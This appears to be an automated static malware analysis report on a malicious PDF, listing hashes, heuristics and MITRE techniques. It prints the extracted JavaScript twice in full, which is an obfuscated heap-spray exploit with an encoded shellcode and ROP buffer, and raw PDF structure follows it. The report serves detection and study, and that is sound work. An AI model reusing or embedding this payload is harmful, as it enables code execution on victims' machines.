Malicious PDF — malware analysis report

Static analysis result for SHA-256 7dd3988bf51a0f19…

MALICIOUS

PDF

53.8 KB First seen: 2026-05-10
MD5: 6aa208c247563545e548a1bf65383c22 SHA-1: 784046916e9676c5ce76b7b2346d2fb73b777f6a SHA-256: 7dd3988bf51a0f19d41b233e2a10d0d37ab6e8bdd6ff2dd8cd62f68bc58d1d61
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 (JavaScript); T1203 (Exploitation for Client Execution)

The PDF file contains embedded JavaScript that uses the `unescape` function to decode a `%u`-encoded buffer and then builds large, repeated strings plus an array of copies of them, a pattern consistent with a heap spray. This JavaScript is most likely intended to exploit a vulnerability in the PDF reader, potentially leading to arbitrary code execution. The presence of XFA form elements and the ML classifier's high-confidence score further support a malicious classification.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture (XFA) — such forms can contain script logic.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.bitstream.com — in PDF document text
    • http://ns.adobe.com/xdp/ — referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/ — referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/ — referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 4027 bytes
SHA-256: 3ddf3130c8895494e34c8c3b2708843e4bb44808e7564fb0295df9e5f6d0a8c2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var hgKjoMbJhYtXmlEkRgwFsBPsPvawy = unescape;
var hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%ua3b8%u6df8%udd1f%ud9c5%u2474%u5ef4%u4631%u8310%u04c6%u4603%u410c%u910d%u0cf7%u6aee%u6e08%u8f66%ubc39%udb1c%u7068%u8956%ufb80%u3a3a%u8912%u4d92%u2793%u60c5%u8624%u2fc9%u89e6%u2db5%u693b%ufd87%u684e%ue0c0%u38a1%u6f99%uac13%u32ae%ucda8%u3960%ub590%ufe05%u0f65%u2f07%u04d5%ud74f%u425d%ue670%u91b2%ua14c%u61bf%u3026%ub816%u02c7%u1656%uaaf6%u675b%u0c3e%u1284%u6e34%u2439%u0c8f%ua1e5%ub612%u116e%u46f7%uc7a2%u447c%u8c0f%u49db%u418e%u7550%u641b%uffb7%u425f%u5b13%ueb3b%u0102%u14ea%ued54%ub053%u1c1e%uc287%u497c%uf864%u897e%u8be2%ubb0d%u27ad%uf79a%ue126%uf75d%u551c%u06f1%ua59f%uccdb%uf5cb%ue473%u9e73%u0983%u30a6%ua5d4%uf019%u0584%u98ca%u89ce%ub835%u43f0%u525e%u040a%ua36b%ue615%ua103%u1715%u2c88%u7df3%u7820%ue9ab%u21d9%u8b27%ufc26%u8b4d%uf2ad%u42b2%u7f46%u33a1%ucaa6%u929b%ue1b9%u1ab6%u0d2c%u4c11%u0fd8%uba44%uf047%ub0a3%u644e%uaf0c%u68ae%u2f8c%ue2f9%u478c%u565d%u72df%u43
a2%u2f73%u6b37%u8322%u0390%ufac8%u8cd7%u2933%uf1e6%u14e5%u036c%u7480%u41ac' );
var KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.length + 20 + 8 < 65536) KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur+=KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
wMYyqksFmBCwZXAYzgljSOuGzZbKa = KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.substring(0, (0x0c0c-0x24)/2);
wMYyqksFmBCwZXAYzgljSOuGzZbKa += hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW;
wMYyqksFmBCwZXAYzgljSOuGzZbKa += KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS = wMYyqksFmBCwZXAYzgljSOuGzZbKa.substring(0, 65536/2);
while(OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.length < 0x80000) OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS += OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS;
EcteVxrRdVOByoiaJdhqgdeDadYO = OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.substring(0, 0x80000 - (0x1020-0x08) / 2);
var nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA = new Array();
for (wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT=0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT<0x1f0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT++) nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA[wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT]=EcteVxrRdVOByoiaJdhqgdeDadYO+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4913 bytes
SHA-256: a106a53b0727c4708073ec6abc5e931733d24cde180fd701f36359945f51d676
Preview script
First 1,000 lines of the extracted script
var hgKjoMbJhYtXmlEkRgwFsBPsPvawy = unescape;
var hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%ua3b8%u6df8%udd1f%ud9c5%u2474%u5ef4%u4631%u8310%u04c6%u4603%u410c%u910d%u0cf7%u6aee%u6e08%u8f66%ubc39%udb1c%u7068%u8956%ufb80%u3a3a%u8912%u4d92%u2793%u60c5%u8624%u2fc9%u89e6%u2db5%u693b%ufd87%u684e%ue0c0%u38a1%u6f99%uac13%u32ae%ucda8%u3960%ub590%ufe05%u0f65%u2f07%u04d5%ud74f%u425d%ue670%u91b2%ua14c%u61bf%u3026%ub816%u02c7%u1656%uaaf6%u675b%u0c3e%u1284%u6e34%u2439%u0c8f%ua1e5%ub612%u116e%u46f7%uc7a2%u447c%u8c0f%u49db%u418e%u7550%u641b%uffb7%u425f%u5b13%ueb3b%u0102%u14ea%ued54%ub053%u1c1e%uc287%u497c%uf864%u897e%u8be2%ubb0d%u27ad%uf79a%ue126%uf75d%u551c%u06f1%ua59f%uccdb%uf5cb%ue473%u9e73%u0983%u30a6%ua5d4%uf019%u0584%u98ca%u89ce%ub835%u43f0%u525e%u040a%ua36b%ue615%ua103%u1715%u2c88%u7df3%u7820%ue9ab%u21d9%u8b27%ufc26%u8b4d%uf2ad%u42b2%u7f46%u33a1%ucaa6%u929b%ue1b9%u1ab6%u0d2c%u4c11%u0fd8%uba44%uf047%ub0a3%u644e%uaf0c%u68ae%u2f8c%ue2f9%u478c%u565d%u72df%u43
a2%u2f73%u6b37%u8322%u0390%ufac8%u8cd7%u2933%uf1e6%u14e5%u036c%u7480%u41ac' );
var KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.length + 20 + 8 < 65536) KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur+=KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
wMYyqksFmBCwZXAYzgljSOuGzZbKa = KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.substring(0, (0x0c0c-0x24)/2);
wMYyqksFmBCwZXAYzgljSOuGzZbKa += hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW;
wMYyqksFmBCwZXAYzgljSOuGzZbKa += KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS = wMYyqksFmBCwZXAYzgljSOuGzZbKa.substring(0, 65536/2);
while(OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.length < 0x80000) OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS += OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS;
EcteVxrRdVOByoiaJdhqgdeDadYO = OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.substring(0, 0x80000 - (0x1020-0x08) / 2);
var nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA = new Array();
for (wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT=0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT<0x1f0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT++) nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA[wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT]=EcteVxrRdVOByoiaJdhqgdeDadYO+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054193 00000 n
0000054226 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54712
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: e6158e60ffa01d3aaa5c48d19f4333dc8919ea17d7b7202cf5b159279fb25a56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray (0x0C).